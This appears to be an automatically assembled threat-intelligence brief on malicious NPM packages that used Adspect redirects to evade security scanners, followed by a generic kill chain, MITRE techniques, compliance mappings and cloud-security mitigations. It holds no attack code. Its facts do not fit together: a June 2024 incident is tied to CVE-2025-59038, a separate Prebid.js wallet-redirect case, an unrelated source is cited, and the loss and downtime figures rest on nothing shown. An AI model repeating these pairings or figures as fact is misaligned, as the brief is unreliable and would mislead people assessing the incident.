Executive Summary
In June 2024, security researchers uncovered a supply chain attack involving seven malicious packages on the NPM registry that abused the Adspect cloud-based service. Attackers used these packages to redirect users through Adspect, circumventing many security sandboxes and researcher analysis tools. This sophisticated evasion allowed threat actors to selectively route potential victims to malicious payloads while deflecting scrutiny from security firms. The malicious packages were rapidly removed from NPM, but not before posing a significant risk to open-source software supply chains.
This incident highlights the increasing exploitation of trusted third-party platforms and infrastructure in software supply chain attacks. With adversaries leveraging evasive redirects and advanced obfuscation tactics, organizations face a growing need for robust dependency management, automated threat detection, and enhanced monitoring of public code repositories.
Why This Matters Now
The malicious NPM package incident underscores the urgent threat of open-source supply chain attacks targeting developer ecosystems. As attackers develop stealthier techniques like redirect abuse, organizations must act swiftly to strengthen their code vetting, dependency controls, and real-time detection to prevent business-critical exposures.
Attack Path Analysis
Attackers introduced malicious npm packages into the supply chain, which were installed by unsuspecting developers or organizations (Initial Compromise). The execution of these packages granted the attacker initial code execution, potentially allowing escalation of privileges within the local or cloud environment (Privilege Escalation). Once on the host or in the environment, the attacker could move laterally to other nodes, workloads, or cloud resources (Lateral Movement). The malware communicated with attacker infrastructure via redirection services to establish command and control (Command & Control). Data or secrets could be exfiltrated from the compromised environment using covert channels or malicious script activity (Exfiltration). Finally, attackers could leverage access for further compromise, persistence, or business disruption (Impact).
Kill Chain Progression
Initial Compromise
Description
Malicious npm packages were published and installed, granting attackers initial access via the supply chain.
Related CVEs
CVE-2025-59038
CVSS 8.6Malicious code in Prebid.js 10.9.2 attempts to redirect cryptocurrency transactions to the attacker's wallet.
Affected Products:
Prebid Prebid.js – 10.9.2
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Command and Scripting Interpreter
Phishing: Spearphishing via Service
Signed Binary Proxy Execution
Application Layer Protocol: Web Protocols
Ingress Tool Transfer
Subvert Trust Controls: Mark-of-the-Web Bypass
Deobfuscate/Decode Files or Information
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Security of Software Development Processes
Control ID: 6.3.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Third-Party Risk Management
Control ID: Art. 9(2)
CISA Zero Trust Maturity Model 2.0 – Asset Inventory and Software Bill of Materials (SBOM)
Control ID: Asset Management–Visibility and Analytics
NIS2 Directive – Security in Network and Information Systems at the Level of Supply Chain
Control ID: Art. 21(2)(e)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
Supply chain attacks targeting npm packages directly compromise software development pipelines, requiring enhanced egress security and zero trust segmentation for development environments.
Information Technology/IT
Malicious npm packages with Adspect redirects create lateral movement risks in IT infrastructure, necessitating multicloud visibility and threat detection capabilities.
Financial Services
Supply chain compromises threaten financial applications built with infected npm packages, demanding encrypted traffic monitoring and compliance with PCI/NIST frameworks.
Health Care / Life Sciences
Healthcare software dependencies face supply chain risks requiring anomaly detection and HIPAA-compliant segmentation to protect patient data systems.
Sources
- Malicious NPM packages abuse Adspect redirects to evade securityhttps://www.bleepingcomputer.com/news/security/malicious-npm-packages-abuse-adspect-redirects-to-evade-security/Verified
- CVE-2025-59038 Detailhttps://nvd.nist.gov/vuln/detail/CVE-2025-59038Verified
- Malicious NPM packages posing as utilities delete project directorieshttps://www.bleepingcomputer.com/news/security/malicious-npm-packages-posing-as-utilities-delete-project-directories/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Applying Zero Trust segmentation, workload isolation, egress policy enforcement, and visibility controls throughout the cloud environment would have restricted the attacker's ability to propagate, communicate externally, and exfiltrate data, limiting the attack to its initial entry point and improving detection. Strong lateral controls, inspection of egress channels, and anomaly/threat detection across workloads are critical to defend against supply chain malware and runtime threats.
Control: Cloud Firewall (ACF)
Mitigation: Blocks known malicious endpoints at initial access.
Control: Zero Trust Segmentation
Mitigation: Restricts privilege escalation paths to sensitive services.
Control: East-West Traffic Security
Mitigation: Blocks unauthorized lateral movement across the internal environment.
Control: Egress Security & Policy Enforcement
Mitigation: Detects and blocks suspicious outbound connections.
Control: Threat Detection & Anomaly Response
Mitigation: Identifies and alerts on anomalous exfiltration attempts.
Enables rapid incident response and containment across cloud workloads.
Impact at a Glance
Affected Business Functions
- Web Development
- Cryptocurrency Transactions
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of sensitive user data and financial information due to malicious redirects.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust segmentation to limit direct workload communication and reduce attack propagation.
- • Enforce strict egress controls with cloud firewalls and FQDN filtering to block malicious outbound connections and C2 traffic.
- • Leverage real-time threat detection and anomaly response for early identification of abnormal behaviors and exfiltration attempts.
- • Increase visibility across multicloud and hybrid environments with centralized policy management and observability tools.
- • Regularly audit installed packages and monitor supply chain dependencies to detect and remediate malicious code introductions early.
